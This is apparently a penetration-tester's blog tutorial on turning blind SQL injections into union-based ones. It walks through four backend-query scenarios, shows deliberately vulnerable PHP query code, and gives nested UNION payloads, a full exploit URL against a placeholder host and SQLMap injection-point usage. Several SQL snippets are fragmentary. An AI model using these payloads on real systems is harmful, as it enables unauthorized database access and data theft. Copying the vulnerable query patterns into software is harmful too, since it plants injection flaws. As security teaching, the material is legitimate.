Healing blind injections
What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones?

Have you ever come across a blind SQL injection while the vulnerable query returns data?
…read the question again…
you got the point?
Let me introduce you to the hidden union-based SQL injection.
imagine this scenario, there is a search functionality on a web application and the URL is like: http://sub.domain.tld/search?query=abcd
By visiting this URL you’ll see all the products with letters abcd
in their name.
After a little testing, you realize the query
the parameter is vulnerable to SQL injection.
you give the URL to SQLMap
and it confirms the SQLi, but a blind one…
now let me ask you the critical question again, how is it possible that the vulnerable query returns data but the injection is blind ???
…think about it for a couple of minutes before you continue…
Part one: Scenarios
Ok, let’s break it down.
based on my experience there are four possible scenarios:
(vulnerable queries are shown in bold)
scenario 1: the vulnerable query is a sub-query of a parent query and the parent query is responsible for returning the data.
id IN (
DISTINCT customer_id
cost > 200
);//source https://careerkarma.com/blog/sql-subquery/
Problem: adding a union payload to the vulnerable query won't affect the returned data, because you are modifying the WHERE
section, not the actual query which returns the data.
Solution: you need to know the actual query being executed to adjust your payload accordingly, which means closing parentheses properly and/or adding proper keywords if needed.
scenario 2. the vulnerable query is a big and complicated one that may contain aliases or variable declarations.
CASE WHEN s2.user_id IS NOT NULL AND s2.sub_type = 'INJECTION' THEN 1 ELSE 0 END
) AS overlap
subscriptions AS s1
LEFT JOIN subscriptions AS s2 ON s1.user_id != s2.user_id
AND s1.start_date <= s2.end_date
AND s1.end_date >= s2.start_date
s1.user_id//source https://codingsight.com/how-to-write-complex-sql-queries/
Problem: in this scenario, when you comment the rest of the original query after your injected payload, you break the beginning part of the original query because some aliases become undefined
Solution: To fix it we need to know the original query to put appropriate parentheses, keywords, and aliases at the beginning of our payload so that the first part of the original query stays valid.
scenario 3. the result of the vulnerable query is being used in a second query and the second query returns the data.
<?php// retrieve product ID based on product name
$query1 = "SELECT
name = '$name'";$result1 = odbc_exec($conn, $query1);// retrieve product's comments based on product ID
$query2 = "SELECT
id = '$result1'";$result1 = odbc_exec($conn, $query2);?>//source https://www.php.net/manual/en/security.database.sql-injection.php
Problem: you can add a union payload to the first query but it won't affect the returned data because the first one is not in charge of returning the data but the second one is.
solution: there is a condition for turning these blind injections into a union-based one, the second query needs to be vulnerable too and its input doesn’t get sanitized. if so, you need to make the first query doesn’t return data, next, append a union query that returns the payload you want to inject in the second query. complicated? what about an example:
the payload (what we inject into the first query):
' AND 1 = 2 UNION SELECT "injection" -- -
value of injection is what we want to inject in the second query:
final payload (after inserting the injection value of the second query):
' AND 1 = 2 UNION SELECT "' AND 1=2 UNION SELECT ..." -- -
the payload that
get's injected
into the second query
the actual query we inject into the vulnerable parameter
the first query after injection:
id |
FROM |----> first query
products |
name = 'abcd' --/
AND 1 = 2 --\
UNION |----> injected payload
"' AND 1=2 UNION SELECT ... -- -" -- -' --/
the second query after injection:
comments |
FROM |----> second query
products |
id = '' --/
AND 1 = 2 --\
UNION |----> injected payload
SELECT ... -- -' --/
it was cool, wasn’t it? 😎😎
scenario 4. the vulnerable parameter is being used in several independent queries.
<?php//retriveing product details based on product ID
$query1 = "SELECT
id = '$id'";$result1 = odbc_exec($conn, $query1);//retriveing product's comments based on product ID, independently
$query2 = "SELECT
id = '$id'";$result2 = odbc_exec($conn, $query2);?>//source https://www.php.net/manual/en/security.database.sql-injection.php
Problem: although you can append a union query to one of the queries and it stays valid, it may break the other one, and the server returns a 500 error instead of the data you want.
Solution: it really depends on the situation, but the first step is to know the original query as always. usually, at the first step, these kinds of injections are only time-based because the delay payload gets inserted in multiple queries and your delay time gets multiplied by a number.
this fact confuses the SQLMap
while extracting data and messes up the output. that means SQLMap
identifies the characters of the output of the query incorrectly.
in a penteset, I executed a query ten times that I managed to build the correct output, manually. I compared the different outputs, identified repeated characters (which are most probably the correct ones), and guessed some of them.
a sign of the existence of one of these hidden union-based injections is:
when you can use ORDER BY
technique to confirm the vulnerability, but you end up with a boolean or time-based one.
that’s when SQLMap
says:'ORDER BY' technique appeares to be usable.
vulnerable query seems to have N columns.
but at the end, it gets confused and reports a blind injection :)
SO… got it?
as you may have realized by now to turn a boolean-based or time-based injection into a union-based (if the query returns data, of course), we need to know the query being executed on the backend.
that’s why when I come across a blind injection,
the first thing I do is to extract the executing query instead of dumping the users
table like newbies. 😒
But how?
Almost all of the widely-used DBMSes have a default table in which the currently executing query is stored. to find that table you need to read the documentation of your target DBMS.
the --statement
flag of SQLMap
automatically does that for you, independent of the backend DBMS.
but I still encourage you to read the documentation because in some scenarios you need to do that manually and SQLMap
can not help.
Part two: automation
how to automate these injections using SQLMap
the general problem in all the scenarios above is we need to safely close the original query and then append a union query to it, which SQLMap
can not do automatically.
so we need to do that manually, we first add the suitable payload for closing the original query to the value of the vulnerable parameter then using an asterisk (*) tell SQLMap
where to start injecting. this way SQLMap
will be exploiting a normal union-based injection. let me help you with an example:
consider the third scenario.
we assume the DMBS is mysql
and the first and second queries return only one column.
if we want to extract the version of the database this would be our payload:
' AND 1=2 UNION SELECT " ' AND 1=2 UNION SELECT @@version -- -" -- -
so the URL would be like:
http://sub.domain.tld/search?query=abcd'+AND+1=2+UNION+SELECT+"+'AND 1=2+UNION+SELECT+@@version+--+-"+--+-
and for automation, this would be the SQLMap
’s input:
http://sub.domain.tld/search?query=abcd'AND 1=2 UNION SELECT "*"-- -
note the asterisk which marks the injection point for SQLMap
was it helpful?
I don’t ask you to buy me a cup of coffee,
teach me something…
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